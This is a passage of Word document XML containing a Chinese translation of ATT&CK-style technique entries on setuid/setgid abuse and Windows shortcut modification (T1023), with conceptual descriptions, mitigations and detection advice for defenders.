          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>位。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8F8148" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>攻击者可以利用此机会执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>转义，或者利用应用程序中具有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> setsuid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> setgid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>位的漏洞，使代码在其他用户的上下文中运行。此外，攻击者可以在自己的恶意软件上使用此机制，以确保他们能够在将来在提升的上下文中执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725F8291" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002C7C02" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5520E597" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="6E0B4C85" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6A14C7DE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3A446CB6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="7BC3E59D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42837251" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002C7C02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>操作系统配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47C56BC3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>具有已知漏洞或已知</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> shell </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>转义的应用程序不应设置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> setuid </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> setgid </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>位，以减少应用程序受到威胁时的潜在损坏。此外，应在整个系统中尽量减少设置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> setuid </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> setgid </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>位的程序数。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="254CA6B5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A42C2C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002C7C02" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件系统中设置</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> setuid </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> setgid </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>位的文件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>实用程序（如</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> chmod</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）的执行及其命令行参数，以查找正在设置的</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> setuid </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> setguid </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>位</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3F533A" w14:textId="021D8253" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E782E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快捷</w:t>
      </w:r>
      <w:r w:rsidR="009C4E03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r w:rsidRPr="003E782E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="4A2133E5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2168973D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00760FB7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00760FB7">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00760FB7">
              <w:t xml:space="preserve"> T1023</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="447EB75B" w14:textId="2B767B80" w:rsidR="000F2665" w:rsidRPr="00760FB7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00760FB7">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00760FB7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C4D00BD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00760FB7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00760FB7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00760FB7">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="412234F7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00760FB7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00760FB7">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00760FB7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00760FB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00760FB7">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00760FB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5856CD8F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00760FB7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00760FB7">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00760FB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1518BB06" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00760FB7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00760FB7">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00760FB7">
              <w:t>: Travis Smith, Tripwire</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70CB8103" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E85DD6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00760FB7">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00760FB7">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76D0AFEE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EFA3233" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>快捷方式或符号链接是引用系统启动过程中单击或执行快捷方式时，打开或执行的其他文件或程序的方法。攻击者可以使用快捷方式持续执行其工具。他们可能会创建一个新的快捷方式作为间接手段，可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00164E1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>伪装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>看起来像一个合法的程序。对手还可以编辑目标路径或完全替换现有快捷方式，以便执行其工具，而不是预期的合法程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F64A85E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="4427F583" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="739BEFD1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="404C24AE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="699629A0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C02754F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户账户</w:t>
            </w:r>
            <w:r>
              <w:t>管理</w:t>
            </w:r>
            <w:hyperlink r:id="rId76" w:history="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="155B45EC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00164E1C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>可以</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> Windows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>中创建符号链接的权限至适当的组，如管理员和虚拟化的必要组。这可以通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> GPO </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>完成：“计算机配置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; [</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>策略</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve">] &gt; Windows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>安全设置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>本地策略</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>用户权限分配：创建符号链接”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40C7D67C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C3A73" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0070717F" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070717F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>由于快捷方式的目标路径可能不会更改，因此对已知软件更改、修补程序、删除等不相关的快捷方式文件的修改可能会可疑。分析应尝试根据已知的攻击者行为（如创建网络连接的未知可执行文件的进程启动）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="0070717F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>将快捷方式文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0070717F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>更改或创建事件与其他潜在可疑事件相关联</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DB1ABB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0070717F" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9D4051" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
